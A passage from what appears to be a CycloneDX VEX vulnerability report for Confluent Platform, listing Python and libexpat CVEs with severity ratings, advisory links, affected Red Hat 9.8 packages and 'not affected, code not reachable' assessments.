          "url": "https://access.redhat.com/security/cve/CVE-2026-3276"
        },
        {
          "url": "https://github.com/python/cpython/commit/6b505d1f41f8f3ea0fe5a4786d3a8fff1875cfc0"
        },
        {
          "url": "https://github.com/python/cpython/commit/90748760d38ca3ac5fc6788a69becab905c95598"
        },
        {
          "url": "https://github.com/python/cpython/commit/991224b1e8311c85f198f6dd8208bf8cff7fc26f"
        },
        {
          "url": "https://github.com/python/cpython/commit/ba785b88add96acbf403d65cb157fb2743a33a32"
        },
        {
          "url": "https://github.com/python/cpython/commit/c5512bd7c1dc28055660565275012766941d3066"
        },
        {
          "url": "https://github.com/python/cpython/commit/d3ab945af25b28dfe13ac6cb40c124a01b33ce1f"
        },
        {
          "url": "https://github.com/python/cpython/commit/db744c0776c1d5dd11aaa70eff2a6993c408bacc"
        },
        {
          "url": "https://github.com/python/cpython/commit/e322a1857084d521f79f45181b776f62e6acfc2c"
        },
        {
          "url": "https://github.com/python/cpython/issues/149079"
        },
        {
          "url": "https://github.com/python/cpython/pull/149080"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PP5HB4K7727OBBM76KA2ILID76K3OZGZ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3276"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/06/03/15"
        }
      ],
      "published": "2026-06-03T16:16:29+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32776",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference with empty external parameter entity content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32776"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32776"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1158"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32776"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32776"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32777",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        835
      ],
      "description": "libexpat before 2.7.5 allows an infinite loop while parsing DTD content.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32777"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32777"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1161"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1162"
        },
        {
          "url": "https://issues.oss-fuzz.com/issues/486993411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32777"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32777"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32778",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32778"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32778"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1159"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1163"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32778"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32778"
        }
      ],
      "published": "2026-03-16T14:19:44+00:00",
      "updated": "2026-07-14T13:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-33056",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
